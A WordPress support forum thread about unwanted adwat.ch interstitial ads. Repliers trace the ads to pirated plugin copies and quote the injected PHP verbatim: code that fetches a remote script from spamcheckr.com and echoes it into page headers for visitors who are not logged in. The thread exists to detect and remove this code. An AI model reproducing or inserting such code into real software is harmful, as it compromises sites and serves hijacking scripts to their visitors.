Support » Fixing WordPress » http://adwat.ch advert keeps appearing

  • Resolved Reedy2013

    (@reedy2013)


    In the last few weeks I’ve noticed some annoying advert http://adwat.ch/ (some American trying to plug his book on how to get women) keeps appearing when I click around my site. You have to wait 10 seconds to leave the advert, then a popup message to leave the page, then the site resumes as normal.

    I’ve experienced this from my home PC and Mac at work, so assume it’s something that’s happened within my wordpress? Perhaps a rogue plugin? Are there any anti-advert plugins out there to stop it? Has anyone come across this?

Viewing 8 replies - 1 through 8 (of 8 total)
  • It sounds like a plugin (or theme), especially if you only see it when you are logged in? If you see it when you are logged out, your site may have been hacked.

    The best thing to do is disable your plugins (start with the newest/most likely) to see if it disappears.

    Many thanks WPMadeEasy, very helpful!

    That thread was useful. Especially this part:

    “Login to you wp-admin and then go to your site
    click view source
    now ctrl+f and search body {visibility:hidden;}
    this code confirms adwatch is inserted in your theme or plugins.”

    Got an idea of what plugins causing it now. Going to check it’s js for any suspicious adwatch code.

    I am facing this same problem since past few days… Please Help

    Just as an aside, for others who may have pulled out every strand of hair trying to resolve this.

    My file was hidden away in “classes/class-settings.php” and called by include ‘classes/class-settings.php’; in my eventon.php file.

    The key is to do a search (I used the Multi-File Search in TextWrangler of my entire site — downloaded locally to my machine) for the following string: spamcheckr

    The “infected” file (class-settings.php) has a ton of commented out lines of code, but it really only does one thing which is to pull the URL “http://spamcheckr.com/l.php”. Just bringing that URL up in your browser will show a blank page. But if you view the source, you will see the following code:

    <script type="text/javascript">
    var adwatch_id = 234224;
    var adwatch_advert = "int";
    var exclude_domains = ['wp-admin', 'wp-login', 'hillaryClinton2016.com', 'mpmgworld.com', 'madeforher.in', 'robfordformayor.ca', 'pachecovirtual.com.ar', 'corporativo2.tk', 'r3d.pt'];
    </script>
    <script type="text/javascript" src="http://adwat.ch/js/easylink.js"></script>

    Just delete the include from your file and delete that class-settings.php and you should be good to go.

    Hope this helps.

    Previous post is useful (search text ‘spamcheckr.com’ in your site’s files)….

    All textlines were:

    <?php if (!isset($_COOKIE[‘wordpress_test_cookie’])){ if (mt_rand(1,20) == 1) {function secqc2_cahesk() {if(function_exists(‘curl_init’)){$addressd = “http://spamcheckr.com/l.php&#8221;;$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo “$data”;}}add_action(‘wp_head’,’secqc2_cahesk’);}} ?>

    My problem was in gravityforms 1.8.4 (not official). Crapfile is ‘gravityforms/includes/settings.php’ and it called from line 56 of ‘gravityforms/gravityforms.php’
    1. Erise line “include ‘includes/settings.php’;” from gravityforms.php
    2. Delete file ‘gravityforms/includes/settings.php’

    PS… don’t touch file ‘gravityforms/settings.php’ its native 🙂

    Thank you guys – I found it in socialbuffs plugin (not original)

    It was hidden in /libs/class.php

    `<?php if (!isset($_COOKIE[‘wordpress_test_cookie’])){ if (mt_rand(1,20) == 1) {function secqc6_chesk() {if(function_exists(‘curl_init’)){$addressd = “http://spamcheckr.com/l.php&#8221;;$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo “$data”;}}add_action(‘wp_head’,’secqc6_chesk’);}} ?>

    I deleted whole class.php, not just that string, and it seems that problem is resolved.

    Justo don’t forget to check all files for suspicious base64_decode string. Where ever is $img data around base64_docode its probably a malicious string.

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘http://adwat.ch advert keeps appearing’ is closed to new replies.